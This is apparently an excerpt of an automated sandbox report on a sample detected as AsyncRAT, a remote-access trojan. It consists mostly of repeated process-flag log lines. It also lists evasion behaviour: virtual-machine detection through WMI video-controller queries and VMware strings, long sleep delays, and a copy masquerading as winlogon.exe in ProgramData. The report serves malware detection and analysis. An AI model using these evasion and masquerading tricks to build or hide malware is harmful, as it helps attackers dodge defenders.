              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\winlogon.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: Process Memory Space: 1bE8S5sN9S.exe PID: 5580, type: MEMORYSTR
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeMemory allocated: 740000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeMemory allocated: 1A610000 memory reserve | memory write watchJump to behavior
              Source: C:\ProgramData\winlogon.exeMemory allocated: B40000 memory reserve | memory write watch
              Source: C:\ProgramData\winlogon.exeMemory allocated: 1A670000 memory reserve | memory write watch
              Source: C:\ProgramData\winlogon.exeMemory allocated: 1140000 memory reserve | memory write watch
              Source: C:\ProgramData\winlogon.exeMemory allocated: 1AAA0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\winlogon.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\winlogon.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWindow / User API: threadDelayed 7311Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWindow / User API: threadDelayed 2539Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5220Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4513Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6923Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2632Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5822Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3859Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6944
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2763
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exe TID: 5792Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep count: 5822 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep count: 3859 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464Thread sleep count: 6944 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep count: 2763 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6096Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\ProgramData\winlogon.exe TID: 356Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\winlogon.exe TID: 2964Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\ProgramData\winlogon.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\ProgramData\winlogon.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\winlogon.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\winlogon.exeThread delayed: delay time: 922337203685477
              Source: 1bE8S5sN9S.exe, 00000000.00000002.3355418142.000000001B360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl>%SystemRoot%\system32\mswsock.dlldel autoConfig="true"/>
              Source: 1bE8S5sN9S.exe, 00000000.00000002.3343268242.0000000000856000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information queried: ProcessInformationJump to behavior
